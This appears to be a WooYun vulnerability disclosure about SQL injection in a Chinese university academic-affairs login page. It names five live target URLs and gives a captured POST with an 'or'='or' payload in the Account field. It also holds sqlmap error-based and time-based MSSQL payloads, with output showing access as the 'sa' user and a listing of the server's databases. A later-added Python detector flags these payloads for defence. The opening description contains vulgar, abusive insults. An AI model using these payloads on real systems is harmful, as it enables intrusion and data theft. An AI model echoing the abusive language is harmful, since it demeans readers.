### Brief description:
Man: "I ask the world, what is love, that..." Woman: one big slap across the mouth, smack! Fuck your mother, a programmer still wants a girlfriend? You deserve to die on your code.
### Detailed description:
As WooYun requested, five cases!
```
http://jwxt.hifa.edu.cn/jiaowu/jwxs/login.asp
http://221.232.159.24/dhjw/jwxs/login.asp
http://jiaowu.hustwenhua.net/jwxs/login.asp
http://xscx.cmcedu.cn/jwxs/login.asp
http://jwxt.hycgy.com:5000/jwxs/login.asp
```
Captured the request while logging in:
![QQ截图20150323134521.png](https://images.seebug.org/upload/201503/23134131b0f9417332aaf2facd5751138e58292a.png)
![2.png](https://images.seebug.org/upload/201503/231341522349117bd2b5164406c21be381e89242.png)
```
POST /dhjw/jwxs/login.asp HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://221.232.159.24/dhjw/jwxs/login.asp
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 221.232.159.24
Content-Length: 108
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: LoginLb=; ASPSESSIONIDCSACRCTD=MMHJDOJDHFEIOOCPPELOLJME
datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
```
![1.png](https://images.seebug.org/upload/201503/23134257049f1fe51cb24b085eb4a35f8897616e.png)
![123.png](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)
```
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: Account
Type: error-based
Title: Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVERT(INT,(SELECT CHAR(113) CHAR(106) CHAR(112) CHAR(122) CHAR(113) (SELECT (CASE WHEN (7256=7256) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(112) CHAR(118) CHAR(113) CHAR(113))) AND 'ogOj'='ogOj&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'QvyA'='QvyA&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1
---
[13:47:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2008
[13:47:47] [INFO] fetching current user
you provided a HTTP Cookie header value. The target URL provided its own cookies within the HTTP Set-Cookie header which intersect with yours. Do you want to merge them in futher requests? [Y/n] Y
[13:47:49] [INFO] retrieved: sa
current user: 'sa'
[13:47:49] [INFO] fetching current database
[13:47:49] [INFO] retrieved: dhjw
current database: 'dhjw'
[13:47:49] [INFO] fetching database names
[13:47:49] [WARNING] reflective value(s) found and filtering out
[13:47:49] [WARNING] the SQL query provided does not return any output
[13:47:49] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[13:47:49] [INFO] fetching number of databases
[13:47:49] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[13:47:51] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[13:47:52] [ERROR] unable to retrieve the number of databases
[13:47:52] [INFO] retrieved: dhjw
[13:47:52] [INFO] retrieved: master
[13:47:52] [INFO] retrieved: tempdb
[13:47:53] [INFO] retrieved: model
[13:47:53] [INFO] retrieved: msdb
[13:47:53] [INFO] retrieved: ReportServer
[13:47:53] [INFO] retrieved: ReportServerTempDB
[13:47:53] [INFO] retrieved: dhjw
[13:47:54] [INFO] retrieved:
available databases [7]:
[*] dhjw
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[13:47:54] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 23 times
[13:47:54] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\221.232.159.24'
[*] shutting down at 13:47:54
```
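As an added example (not part of the original report), a small Python checker that decodes the captured login POST body the way the GBK-encoded form is submitted and flags the three injection shapes shown above: the manual `'or'='or'` quote breakout in `Account`, sqlmap's error-based `CONVERT(INT, ... CHAR(n))` payload, and the `sysusers` heavy-query timing payload. The request bodies are constructed, abbreviated copies of the ones on this page, and the rule names are my own.

```python
import re
from urllib.parse import parse_qs

# Constructed copies of the request bodies shown in this report: the manual
# 'or'='or' login attempt, and abbreviated forms of the two payloads sqlmap
# printed (the '+' between CHAR() calls is already collapsed to spaces there).
MANUAL_BODY = ("datetime=2015-3-23+13%3A12%3A50&loginNum=&Account=%27or%27%3D%27or%27"
               "&Password=l&B1=%A1%A1%C8%B7%B6%A8%A1%A1")
ERROR_BASED_BODY = ("datetime=2015-3-23 13:12:50&loginNum=&Account=-2532' OR 7256=CONVERT"
                    "(INT,(SELECT CHAR(113) CHAR(106) (SELECT (CASE WHEN (7256=7256) THEN "
                    "CHAR(49) ELSE CHAR(48) END)) CHAR(113))) AND 'ogOj'='ogOj&Password=l")
TIME_BASED_BODY = ("datetime=2015-3-23 13:12:50&loginNum=&Account=-4128' OR 4975=(SELECT "
                   "COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3) AND "
                   "'QvyA'='QvyA&Password=l")

# Detection rules (names are my own), applied to each decoded parameter value.
RULES = [
    # a string literal closed early and followed by OR: 'or'='or', -2532' OR ...
    ("quote-or", re.compile(r"'\s*or\b", re.I)),
    # MSSQL error-based extraction: CONVERT(INT, ... CHAR(n) ...) forces a
    # conversion error whose message carries the selected value
    ("mssql-error-based",
     re.compile(r"convert\s*\(\s*int\s*,.*char\s*\(\s*\d+\s*\)", re.I | re.S)),
    # heavy-query timing oracle: sysusers cross-joined with itself
    ("mssql-heavy-query",
     re.compile(r"from\s+sysusers\s+as\s+\w+\s*,\s*sysusers", re.I)),
]


def decode_form(body: str) -> dict:
    """Decode the x-www-form-urlencoded body as the GBK form the target uses
    (B1 decodes to the full-width button label '　确定　'); first value wins."""
    fields = parse_qs(body, keep_blank_values=True, encoding="gbk", errors="replace")
    return {name: values[0] for name, values in fields.items()}


def scan_form(body: str) -> dict:
    """Return {parameter: [matched rule names]} for parameters that look like
    SQL injection; an empty dict means nothing matched."""
    findings = {}
    for name, value in decode_form(body).items():
        matched = [rule for rule, pattern in RULES if pattern.search(value)]
        if matched:
            findings[name] = matched
    return findings


if __name__ == "__main__":
    for label, body in (("manual", MANUAL_BODY), ("error-based", ERROR_BASED_BODY),
                        ("time-based", TIME_BASED_BODY)):
        print(label, scan_form(body))
```

The same `scan_form` can be run over IIS request logs or a WAF tap; the 23 HTTP 500 responses sqlmap reported are the server-side counterpart worth alerting on.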
### Proof of vulnerability:
![123.png](https://images.seebug.org/upload/201503/2313440159ab6f8528b8f3f0031052af6310006e.png)